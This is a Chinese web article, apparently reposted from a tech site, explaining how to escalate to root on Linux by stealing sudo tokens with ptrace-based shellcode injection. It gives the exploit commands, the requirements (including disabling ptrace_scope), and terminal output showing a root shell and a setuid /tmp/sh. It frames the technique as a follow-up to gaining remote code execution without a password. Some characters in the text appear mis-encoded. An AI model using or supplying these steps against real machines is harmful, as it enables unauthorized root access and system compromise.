溫馨提示×

您好,登錄后才能下訂單哦!

密碼登錄×
登錄注冊(cè)×
其他方式登錄
點(diǎn)擊 登錄注冊(cè) 即表示同意《億速云用戶服務(wù)條款》

linux中如何利用sudo token實(shí)現(xiàn)提權(quán)

發(fā)布時(shí)間:2021-11-01 17:36:46 來源:億速云 閱讀:154 作者:小新 欄目:編程語(yǔ)言

小編給大家分享一下linux中如何利用sudo token實(shí)現(xiàn)提權(quán),希望大家閱讀完這篇文章之后都有所收獲,下面讓我們一起去探討吧!

如何利用系統(tǒng)中的漏洞?

$sudo whatever
[sudo]password for user:    # Press<ctrl>+c since you don't have the password. # This creates an invalidsudo tokens.
$ sh exploit.sh
....wait 1 seconds
$sudo -i # no password required :)
# id
uid=0(root)gid=0(root) groups=0(root)

實(shí)現(xiàn)要求

1、 完全啟用Ptrace(/proc/sys/kernel/yama/ptrace_scope == 0);

2、 當(dāng)前用戶必須開啟一個(gè)擁有有效sudo令牌并且相同uid的活動(dòng)進(jìn)程;

注:默認(rèn)密碼的超時(shí)時(shí)間為15分鐘,如果你在15分鐘內(nèi)使用sudo兩次,系統(tǒng)就不會(huì)要求你再輸入用戶的sudo密碼了。

工作機(jī)制

項(xiàng)目目錄中的Exploit.sh會(huì)向當(dāng)前用戶的所有進(jìn)程注入Shell代碼,并使用它們的sudo令牌來驗(yàn)證我們自己的sudo口令。僅需三行Shell代碼,一切皆有可能。

使用樣例

假設(shè),你拿到了一個(gè)RCE,而且沒有用戶密碼,但目標(biāo)用戶使用了sudo,那么你就可以通過竊取他的sudo令牌來實(shí)現(xiàn)提權(quán)啦!

如何在實(shí)驗(yàn)環(huán)境中模擬?

#echo 0 > /proc/sys/kernel/yama/ptrace_scope
# #Don't worry this is not persistent accross reboot

打開兩個(gè)終端窗口:

1、 其中一個(gè)執(zhí)行sudo命令,然后輸入正確的用戶密(sudo ls);

2、 另一個(gè)按照上述方法執(zhí)行漏洞利用代碼;

使用exploit_v2.sh在/tmp/sh中創(chuàng)建一個(gè)suid sh

如果exploit_v1無(wú)法成功的話,大家可以嘗試一下exploit_v2.sh:

$./exploit_v2.sh
Currentprocess : 2441
chmod:changing permissions of 'activate_sudo_token': Operation not permitted
Injectingprocess 1721 -> bash
Injectingprocess 2433 -> bash
cat:/proc/2446/comm: No such file or directory
Injectingprocess 2446 ->
$/tmp/sh -p
# id
uid=1001(test)gid=1001(test) euid=0(root) egid=0(root) groups=0(root),1001(test)

看完了這篇文章,相信你對(duì)“l(fā)inux中如何利用sudo token實(shí)現(xiàn)提權(quán)”有了一定的了解,如果想了解更多相關(guān)知識(shí),歡迎關(guān)注億速云行業(yè)資訊頻道,感謝各位的閱讀!

向AI問一下細(xì)節(jié)

免責(zé)聲明:本站發(fā)布的內(nèi)容(圖片、視頻和文字)以原創(chuàng)、轉(zhuǎn)載和分享為主,文章觀點(diǎn)不代表本網(wǎng)站立場(chǎng),如果涉及侵權(quán)請(qǐng)聯(lián)系站長(zhǎng)郵箱:is@yisu.com進(jìn)行舉報(bào),并提供相關(guān)證據(jù),一經(jīng)查實(shí),將立刻刪除涉嫌侵權(quán)內(nèi)容。

AI